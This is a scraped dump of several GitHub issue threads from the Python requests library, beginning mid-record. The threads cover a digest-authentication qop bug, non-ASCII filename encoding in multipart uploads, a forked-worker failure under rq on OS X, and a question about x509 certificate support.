r.status_code\n200\n```\n", "So the weird thing is: why don't they want that cookie back?\n" ]
https://api.github.com/repos/psf/requests/issues/2408
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2408/labels{/name}
https://api.github.com/repos/psf/requests/issues/2408/comments
https://api.github.com/repos/psf/requests/issues/2408/events
https://github.com/psf/requests/issues/2408
54,311,142
MDU6SXNzdWU1NDMxMTE0Mg==
2,408
Wrong digest header creation when server has qop="auth,auth-int"
{ "avatar_url": "https://avatars.githubusercontent.com/u/10529974?v=4", "events_url": "https://api.github.com/users/berndschultze/events{/privacy}", "followers_url": "https://api.github.com/users/berndschultze/followers", "following_url": "https://api.github.com/users/berndschultze/following{/other_user}", "gists_url": "https://api.github.com/users/berndschultze/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/berndschultze", "id": 10529974, "login": "berndschultze", "node_id": "MDQ6VXNlcjEwNTI5OTc0", "organizations_url": "https://api.github.com/users/berndschultze/orgs", "received_events_url": "https://api.github.com/users/berndschultze/received_events", "repos_url": "https://api.github.com/users/berndschultze/repos", "site_admin": false, "starred_url": "https://api.github.com/users/berndschultze/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/berndschultze/subscriptions", "type": "User", "url": "https://api.github.com/users/berndschultze", "user_view_type": "public" }
[]
closed
true
null
[]
null
7
2015-01-14T11:21:32Z
2021-09-08T23:06:03Z
2015-01-27T18:22:53Z
NONE
resolved
I always get "401 unauthorized" when trying to log in to a server which writes qop="auth,auth-int" in its answer. The problem doesn't exist with Curl. I debugged the requests code and probably found the problem in auth.py. The function build_digest_header in class HTTPDigestAuth calculates noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, qop, HA2) and gives back base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce) to the server. So in our client digest calculation we use qop="auth,auth-int", which we take from the server response, and make the server use qop="auth" in its calculation by giving back this header. While debugging I can log in correctly if I change noncebit on the fly to noncebit = "%s:%s:%s:%s:%s" % (nonce, ncvalue, cnonce, "auth", HA2) This would be my suggestion for the solution. Theqop for the calculation should be the same as we give back in our header.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2408/reactions" }
https://api.github.com/repos/psf/requests/issues/2408/timeline
null
completed
null
null
false
[ "We do not use `qop=auth-int`, we don't support it. When given multiple `qop` values like that in an auth challenge we're allowed to select one, and we have: `auth`.\n\nYou're right, however, about the fix. If we've chosen `auth` that's what we should use in our calculation. The simplest fix should be to pull the calculation of `noncebit` down into the only place it's used.\n\nThat said, can RFCreader @sigmavirus24 confirm that this is correct WRT the specs?\n", "> That said, can RFCreader @sigmavirus24 confirm that this is correct WRT the specs?\n\nIs this the new requests/urllib3 thing? If so, I thoroughly approve.\n", "Thank you for your quick responses.\nWould pulling down noncebit also fit for qop=\"auth,auth-int\"? Wouldn't we still calculate with the wrong qop in case we match the condition \"'auth' in qop.split(',')\" as we would do with qop=\"auth,auth-int\"?\nI think we should not calculate with the qop we read from the response and instead with the one we write into the header (the constant \"auth\").\n", "@berndschultze Sorry, I was insufficiently clear. I agree. What I meant was pulling that line into the `auth` block _and_ changing it to always specifically use `auth`.\n", "@Lukasa You are right, I misunderstood. Thanks again.\n", "I went back through [RFC 2617](https://tools.ietf.org/html/rfc2617#page-8) (which is still the definition of Digest Access Authentication, although parts were _updated_ (not obsoleted) by 7235). tl;dr the ABNF says unambiguously:\n\n```\n qop-value = \"auth\" | \"auth-int\" | token\n```\n\nWhere `token` is one or more letters (`a-zA-Z`), digits (`0-9`), and US-ASCII visible characters (excluding `(),/:;<=>?@[\\]{}` and `\"`). In otherwords, _technically_ the server is doing the wrong thing but we can handle it because a `,` should never be part of the `qop-value` so it should be safe to approach this by following roughly this logic:\n\n``` py\nif 'auth' in set(qop_value.split(',')):\n qop = 'auth'\nelse:\n return None # or whatever we return when we're not doing 'auth'\n```\n", "@berndschultze if you want to test out #2415 and let us know how that goes, that'd be awesome.\n" ]
https://api.github.com/repos/psf/requests/issues/2407
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2407/labels{/name}
https://api.github.com/repos/psf/requests/issues/2407/comments
https://api.github.com/repos/psf/requests/issues/2407/events
https://github.com/psf/requests/issues/2407
54,189,745
MDU6SXNzdWU1NDE4OTc0NQ==
2,407
there is a bug when filename contains a non-ascii character
{ "avatar_url": "https://avatars.githubusercontent.com/u/4251771?v=4", "events_url": "https://api.github.com/users/mushanshitiancai/events{/privacy}", "followers_url": "https://api.github.com/users/mushanshitiancai/followers", "following_url": "https://api.github.com/users/mushanshitiancai/following{/other_user}", "gists_url": "https://api.github.com/users/mushanshitiancai/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/mushanshitiancai", "id": 4251771, "login": "mushanshitiancai", "node_id": "MDQ6VXNlcjQyNTE3NzE=", "organizations_url": "https://api.github.com/users/mushanshitiancai/orgs", "received_events_url": "https://api.github.com/users/mushanshitiancai/received_events", "repos_url": "https://api.github.com/users/mushanshitiancai/repos", "site_admin": false, "starred_url": "https://api.github.com/users/mushanshitiancai/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/mushanshitiancai/subscriptions", "type": "User", "url": "https://api.github.com/users/mushanshitiancai", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2015-01-13T12:51:34Z
2021-09-08T23:06:12Z
2015-01-13T13:07:00Z
NONE
resolved
I ues python 2.7.9 and requests 2.5.1 when I do like this: ``` files = {'file1':('中文','hello')} r = requests.post('http://test',files=files) ``` the request is like this(copy from fiddler): ``` Content-Disposition: form-data; name="file1"; filename*=utf-8''%E4%B8%AD%E6%96%87 ``` I think the format of filename is wrong. the right format should be: ``` Content-Disposition: form-data; name="file1"; filename="中文" ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2407/reactions" }
https://api.github.com/repos/psf/requests/issues/2407/timeline
null
completed
null
null
false
[ "in requests\\packages\\urllib3\\fields.py\n\n```\ndef format_header_param(name, value):\n if not any(ch in value for ch in '\"\\\\\\r\\n'):\n result = '%s=\"%s\"' % (name, value)\n try:\n result.encode('ascii')\n except UnicodeEncodeError:\n pass\n else:\n return result\n if not six.PY3: # Python 2:\n value = value.encode('utf-8')\n value = email.utils.encode_rfc2231(value, 'utf-8')\n value = '%s*=%s' % (name, value)\n return value\n```\n\nI think this is related code.\n\nWhen the Content-Type is multipart/form-data,is it correct ues this function to format heaer?\n", "Duplicate of #2313. Please search for existing issues before opening new ones in the future.\n" ]
https://api.github.com/repos/psf/requests/issues/2406
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2406/labels{/name}
https://api.github.com/repos/psf/requests/issues/2406/comments
https://api.github.com/repos/psf/requests/issues/2406/events
https://github.com/psf/requests/issues/2406
54,140,897
MDU6SXNzdWU1NDE0MDg5Nw==
2,406
Unusable `requests` in main and forked processes (`rq` worker script)
{ "avatar_url": "https://avatars.githubusercontent.com/u/104093?v=4", "events_url": "https://api.github.com/users/ducu/events{/privacy}", "followers_url": "https://api.github.com/users/ducu/followers", "following_url": "https://api.github.com/users/ducu/following{/other_user}", "gists_url": "https://api.github.com/users/ducu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ducu", "id": 104093, "login": "ducu", "node_id": "MDQ6VXNlcjEwNDA5Mw==", "organizations_url": "https://api.github.com/users/ducu/orgs", "received_events_url": "https://api.github.com/users/ducu/received_events", "repos_url": "https://api.github.com/users/ducu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ducu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ducu/subscriptions", "type": "User", "url": "https://api.github.com/users/ducu", "user_view_type": "public" }
[]
closed
true
null
[]
null
33
2015-01-13T01:52:32Z
2021-09-08T15:00:53Z
2015-01-15T09:50:52Z
NONE
resolved
This is a follow up from https://github.com/kennethreitz/requests/issues/2399#issuecomment-69675695 As stated there, this is a problem which has to do with `requests` being used in both a main process and forked processes -- the `rq` worker script. If the network goes down even for a short while, `requests` raises few exceptions (ConnectionError) then it becomes unusable and the forked processes get killed instantly if they try to use it (requests.get). The issue is described on the `rq` side as well: https://github.com/nvie/rq/issues/473 Sorry if this not very clear, tired now and I'm struggling with this issue for few weeks already... I've put up a gist to reproduce it (https://gist.github.com/ducu/ee8c0b1028775df6c72e), but please let me know if I can help. Thanks a lot for your support, cheers
{ "avatar_url": "https://avatars.githubusercontent.com/u/104093?v=4", "events_url": "https://api.github.com/users/ducu/events{/privacy}", "followers_url": "https://api.github.com/users/ducu/followers", "following_url": "https://api.github.com/users/ducu/following{/other_user}", "gists_url": "https://api.github.com/users/ducu/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ducu", "id": 104093, "login": "ducu", "node_id": "MDQ6VXNlcjEwNDA5Mw==", "organizations_url": "https://api.github.com/users/ducu/orgs", "received_events_url": "https://api.github.com/users/ducu/received_events", "repos_url": "https://api.github.com/users/ducu/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ducu/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ducu/subscriptions", "type": "User", "url": "https://api.github.com/users/ducu", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2406/reactions" }
https://api.github.com/repos/psf/requests/issues/2406/timeline
null
completed
null
null
false
[ "Does requests misbehave if you pull the link down without forking? That is, if you have a single ordinary script, no forking or workers, using requests, does it hang if you run `ifconfig en0 down` in the same way?\n", "Nope, only when forking. \n\nIf you call `count_words_at_url` in a single process for loop it works properly raising exception while the network is down and recovering (performing requests) when gets back up. \n\n—\nSent from Mailbox\n\nOn Tue, Jan 13, 2015 at 8:28 AM, Cory Benfield [email protected]\nwrote:\n\n> ## Does requests misbehave if you pull the link down without forking? That is, if you have a single ordinary script, no forking or workers, using requests, does it hang if you run `ifconfig en0 down` in the same way?\n> \n> Reply to this email directly or view it on GitHub:\n> https://github.com/kennethreitz/requests/issues/2406#issuecomment-69705464\n", "Well that's utterly bizarre. What platform are you running on?\n", "I'm using Python 2.7.7 on OS X, will try this on Ubuntu today see if it behaves the same way.\n\n—\nSent from Mailbox\n\nOn Tue, Jan 13, 2015 at 8:36 AM, Cory Benfield [email protected]\nwrote:\n\n> ## Well that's utterly bizarre. What platform are you running on?\n> \n> Reply to this email directly or view it on GitHub:\n> https://github.com/kennethreitz/requests/issues/2406#issuecomment-69706103\n", "@ducu Thanks for doing that investigation, it'll be helpful (I don't have any machines with Redis installed atm).\n\nWhile we're waiting on that I can infodump a few things. Firstly, requests has little-to-no global state. We certainly don't persist any of our own objects at the top-level, though I can't guarantee right now that none of the import machinery has anything to do with anything.\n\nGarbage collection _should_ ensure that the socket you created initially is cleaned up because you aren't using a Session object. This is good, as it means that you shouldn't be accidentally re-using an invalid file handle (I think).\n\nUnfortunately, right now I'm all out of ideas, so I'd like to see if we can get a consistent repro on multiple platforms to exclude single-platform weirdness before I dive in further. We may need to get some serious debugging tools onto this task.\n", "@Lukasa Sure, I hope we can get to the bottom of this.\n\nFor now I'm running the gist on an AWS instance with ubuntu-trusty-14.04-amd64-server-20140927 (ami-f0b11187) via SSH. This means I cannot disable the network adapter (can't do `sudo ifconfig en0 down`), so I thought to use iptables to block outgoing http traffic (`sudo iptables -A OUTPUT -p tcp --dport 80 -j REJECT`) which is not exactly the same.. \n\nBy doing this I cannot reproduce the issue, `requests` behaves properly -- it raises ConnectionError: ('Connection aborted.', error(111, 'Connection refused')) when traffic is rejected by the firewall, and recovers to running normally when the rule is deleted (`sudo iptables -D OUTPUT -p tcp --dport 80 -j REJECT`).\n\nPython 2.7.6 (default, Mar 22 2014, 22:59:56) [GCC 4.8.2] on linux2\n\nPlease let me know if I'm off-track here..\nI will try doing the same iptables trick on my Mac tonight and see if there's any difference.\n", "## Can you give us more detail about the ConnectionError you originally described?\n\nSent from my Android device with K-9 Mail. Please excuse my brevity.\n", "Omw home to get the Mac, be back shortly and give all the details\n\nOn Tue, Jan 13, 2015 at 2:20 PM, Ian Cordasco [email protected]\nwrote:\n\n> Can you give us more detail about the ConnectionError you originally\n> \n> ## described?\n> \n> Sent from my Android device with K-9 Mail. Please excuse my brevity.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2406#issuecomment-69742693\n> .\n", "I'm inclined to believe you really do have to bring the adapter down for this to be a problem. The nature of the error will be very different: for example, without an adapter the `bind` call should fail, whereas with the iptables solution it'll just hang without receiving messages.\n", "Yep it seems so, there's a different exception I get when taking the network down:\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n\nUnfortunately I don't have a linux box to try this locally by disabling the adapter, but on my Mac it definitely happens. Below you can see the relevant output of the script.\n\nFirst it calls `print count_words_at_url('http://python-rq.org/')` from within the main process, which causes the problem later. If this [line](https://gist.github.com/ducu/ee8c0b1028775df6c72e#file-_test_rq_requests-py-L23) is commented the issue doesn't appear.\n\n```\nLast login: Tue Jan 13 15:10:16 on ttys015\nducusmac:temp Ducu$ . env/bin/activate\n(env)ducusmac:temp Ducu$ python -c \"from _test_rq_requests import custom_worker; custom_worker()\"\n489 \n```\n\nWorker starts properly..\n\n```\n15:13:57 RQ worker started, version 0.4.6\n15:13:57 \n15:13:57 *** Listening on test...\n15:13:57 test: _test_rq_requests.count_words_at_url('http://onion.com/1A1cSXV') (b7400d86-015d-4229-ae32-f9d73c842652)\n15:13:58 Job OK, result = 2431\n15:13:58 Result is kept for 500 seconds.\n15:13:58 \n15:13:58 *** Listening on test...\n15:13:58 test: _test_rq_requests.count_words_at_url('http://lifehac.kr/zjndlpn') (65c08d69-23de-48b3-b687-9412f05b46a6)\n15:14:01 Job OK, result = 3752\n15:14:01 Result is kept for 500 seconds.\n15:14:01 \n15:14:01 *** Listening on test...\n15:14:01 test: _test_rq_requests.count_words_at_url('https://medium.com/@micah/conan-what-is-best-in-life-16d832026724') (376d86f7-9b63-41ff-9e0a-1fef2cfaa79b)\n15:14:02 Job OK, result = 3036\n15:14:02 Result is kept for 500 seconds.\n15:14:02 \n```\n\nAnd at this time I'm doing `ifconfig en0 down` in a separate Terminal window taking the network down\n\n```\n15:14:02 *** Listening on test...\n15:14:02 test: _test_rq_requests.count_words_at_url('http://huff.to/1Bap2xl') (c99c2681-2c2e-4eb3-86e0-271890377c71)\n15:14:04 ConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n15:14:04 Moving job to failed queue.\n15:14:04 \n\n*[Moving job to failed queue approx. 130 times]*\n\n15:14:13 \n15:14:13 *** Listening on test...\n15:14:13 test: _test_rq_requests.count_words_at_url('http://bit.ly/13ErUHj') (40f5086d-dbc8-4cdc-bf02-a2ee0531edf0)\n15:14:13 ConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\nTraceback (most recent call last):\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/worker.py\", line 543, in perform_job\n rv = job.perform()\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/rq/job.py\", line 482, in perform\n self._result = self.func(*self.args, **self.kwargs)\n File \"_test_rq_requests.py\", line 18, in count_words_at_url\n resp = requests.get(url, timeout=3)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 65, in get\n return request('get', url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/api.py\", line 49, in request\n response = session.request(method=method, url=url, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 461, in request\n resp = self.send(prep, **send_kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/sessions.py\", line 573, in send\n r = adapter.send(request, **kwargs)\n File \"/Users/Ducu/Developer/Svven/tests/temp/env/lib/python2.7/site-packages/requests/adapters.py\", line 415, in send\n raise ConnectionError(err, request=request)\nConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n15:14:13 Moving job to failed queue.\n15:14:13 \n```\n\nThen suddenly `requests` becomes unusable, doesn't raise exceptions anymore and kills forked processes thus leaving the jobs in the 'started' status. It's like the worker goes into this \"strike mode\" and it never recovers not even if the network gets back up.\n\n```\n15:14:13 *** Listening on test...\n15:14:13 test: _test_rq_requests.count_words_at_url('http://ow.ly/EUAk9') (08cfa2cb-cde3-4567-acfa-86a49eb6dcb9)\n15:14:13 \n15:14:13 *** Listening on test...\n15:14:13 test: _test_rq_requests.count_words_at_url('http://ow.ly/2SEzc6') (e754bb36-c820-4634-b03c-3741521c23af)\n15:14:14 \n15:14:14 *** Listening on test...\n15:14:14 test: _test_rq_requests.count_words_at_url('http://allday.com/g/bomb') (7918ceda-2e33-4c8d-8fa5-d380dd82eb2c)\n15:14:14 \n\n*[The same output getting job after job and leaving them unprocessed until worker is shut down]*\n\n15:14:27 *** Listening on test...\n15:14:27 test: _test_rq_requests.count_words_at_url('http://www.producthunt.com/posts/nugget') (ca292ec8-e06a-4aa8-872a-458652dfd037)\n^C15:14:27 Warm shut down requested.\n15:14:28 Stopping on request.\n(env)ducusmac:temp Ducu$ \n```\n\nI hope this clarifies a bit the behaviour. I know this is also a `rq` problem but it's the only way I could reproduce the issue. This is my OS X environment \n\n(env)ducusmac:temp Ducu$ python\nPython 2.7.7 (default, Jun 2 2014, 18:55:26) \n[GCC 4.2.1 Compatible Apple LLVM 5.1 (clang-503.0.40)] on darwin\n\nIt would be great if any of you guys would try to run the script on a linux machine locally. If you have any other ideas please let me know.\n", "So that error is related to DNS (which is why a simple `iptables` example doesn't work). I'm surprised this continues after the interface comes back up. I would think TTLs would prevent the DNS cache from being poisoned and causing issues, but DNS caching issues seem like the next logical problem. I wonder if the developers of `rq` have any ideas. This is certainly something I've never seen happen with plain `requests`.\n", "@sigmavirus24 I suspected it's because of forking.\n\nAs I mentioned previously, having a single process with a simple loop to perform `count_words_at_url` doesn't cause this issue.. as `requests` recovers after the network gets back up.\n", "@sigmavirus24 But even using the `rq`..\nIt also recovers if `requests.get` is **not** called before forking -- comment that [line](https://gist.github.com/ducu/ee8c0b1028775df6c72e#file-_test_rq_requests-py-L23) and there's no issue.\n", "@ducu Is this a personal mac machine or one running OS X server?\n", "Actually, regardless, I think it's critical to try to find a Linux repro, because I wouldn't be at all surprised to find this is the fault of [discoveryd](http://arstechnica.com/apple/2015/01/why-dns-in-os-x-10-10-is-broken-and-what-you-can-do-to-fix-it/).\n", "I have a personal Mac, not a server. Yeah should find a Linux to test this.. sorry but I don't have it (I'm not much of a Linux connaisseur either). For my use case the workaround would be -- not to use `requests` in the main worker process but only in the forks. This works fine so I can go on..\n\nBut please let me know if I can help fixing this in any other way. Cheers\n\n—\nSent from Mailbox\n", "Ok guys, I managed to test this on Ubuntu via VirtualBox and no issue there..\n\nThe exception being raised when disabling the network is\n\n> ConnectionError: ('Connection aborted.', gaierror(-2, 'Name or service not known'))\n\ndifferent than what I get on the Mac\n\n> ConnectionError: ('Connection aborted.', gaierror(8, 'nodename nor servname provided, or not known'))\n\nThe script goes on properly after the network gets back up, so `requests` is getting responses. I guess I can close this ticket, may be what @Lukasa is suggesting, something to do with the OS X DNS service.\n\nThanks a lot for your support, cheers\n", "@ducu No problem! I hope this does get resolved, though it looks like discoveryd is ruining a lot of people's days at the minute.\n", "I'm experiencing the same behavior on a worker within a Docker running Ubuntu. I'm considering using urllib2 instead of requests. Did anybody try that as a work-around?\n", "@erdillon What specific behaviour is that? There is a quite lengthy debugging discussion in this issue: how much of that have you seen?\n", "@Lukasa I'm currently chasing rq forked child processes that die on my without notice on a larger POST request. No exception, nothing to be found. I've tracked it down to the actual POST. \n", "So that makes this somewhat unlike the original issue, which did see exceptions from requests. Are you interested in trying to dive in and see if we can work out what is going wrong?\n", "I came to this thru nvie/rq#473. I just re-read this thread and you are right. I'm not seeing ANY exception. The worker goes away with no warning. \n", "So this is at least somewhat different. What you need to do, I think, is to investigate what's happening when the worker dies. You may need to attach something like strace to the worker to get that insight.\n", "@erdillon I believe I'm seeing the same sort of problem -- did you ever figure it out?\n", "@jjwon0 I did not figure it out. But in the meantime i've seen similar behavior go away after upgrading to the latest versions on the requests package. Are you up2date on all the libs?\n", "just reposting an issue I've been having related to this:\n\nHey guys, @selwin @ducu @Lukasa @erdillon \n\nI've got an issue related to this (i think). But it's actually really easy to replicate. When making a request from a worker fails, the worker just dies, but no errors are reported nor is the job sent to the failed queue. \n\nmy example:\n\n```\ndef make_request():\n print \"making response\"\n response = requests.get(\"https://some.madeup.url\")\n print \"got response\"\n\nif __name__ == \"__main__\":\n make_request()\n```\n\nWhen I queue `make_request` the process just quits when making the request. Whereas a traceback is thrown when I execute the script directs. Took me a while to track this down, is there a fix or something I may be doing wrong?\n", "Forgot to comment with the solution we came up with, hope it's helpful to someone.\n\nOur problem was that we had a retry manager which would try making requests a few times on an `IOLoop`. It was failing because RQ was just aggressively killing the process once something was queued on the `IOLoop` because nothing was running.\n\nOur solution was for the function sent to RQ to generate a `Future` from the retry manager which only resolved when it was done, and waiting on this future before returning.\n", "@dflatow See @jjwon0. However, the fact that it was causing a traceback in the main thread suggests the issue is with RQ, not requests. \n", "@erdillon see nvie/rq#702 and nvie/rq#710 for the issue of rq not properly handling the killing of the python process of a worker.\n" ]
https://api.github.com/repos/psf/requests/issues/2405
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2405/labels{/name}
https://api.github.com/repos/psf/requests/issues/2405/comments
https://api.github.com/repos/psf/requests/issues/2405/events
https://github.com/psf/requests/issues/2405
54,111,802
MDU6SXNzdWU1NDExMTgwMg==
2,405
x509 Certificate
{ "avatar_url": "https://avatars.githubusercontent.com/u/505939?v=4", "events_url": "https://api.github.com/users/kvarga/events{/privacy}", "followers_url": "https://api.github.com/users/kvarga/followers", "following_url": "https://api.github.com/users/kvarga/following{/other_user}", "gists_url": "https://api.github.com/users/kvarga/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kvarga", "id": 505939, "login": "kvarga", "node_id": "MDQ6VXNlcjUwNTkzOQ==", "organizations_url": "https://api.github.com/users/kvarga/orgs", "received_events_url": "https://api.github.com/users/kvarga/received_events", "repos_url": "https://api.github.com/users/kvarga/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kvarga/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kvarga/subscriptions", "type": "User", "url": "https://api.github.com/users/kvarga", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2015-01-12T21:50:24Z
2021-09-08T23:06:13Z
2015-01-12T22:25:22Z
NONE
resolved
Is there any support for x509 certificate authentication with requests? I can't seem to find any examples and would much prefer to use requests.
{ "avatar_url": "https://avatars.githubusercontent.com/u/505939?v=4", "events_url": "https://api.github.com/users/kvarga/events{/privacy}", "followers_url": "https://api.github.com/users/kvarga/followers", "following_url": "https://api.github.com/users/kvarga/following{/other_user}", "gists_url": "https://api.github.com/users/kvarga/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kvarga", "id": 505939, "login": "kvarga", "node_id": "MDQ6VXNlcjUwNTkzOQ==", "organizations_url": "https://api.github.com/users/kvarga/orgs", "received_events_url": "https://api.github.com/users/kvarga/received_events", "repos_url": "https://api.github.com/users/kvarga/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kvarga/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kvarga/subscriptions", "type": "User", "url": "https://api.github.com/users/kvarga", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2405/reactions" }
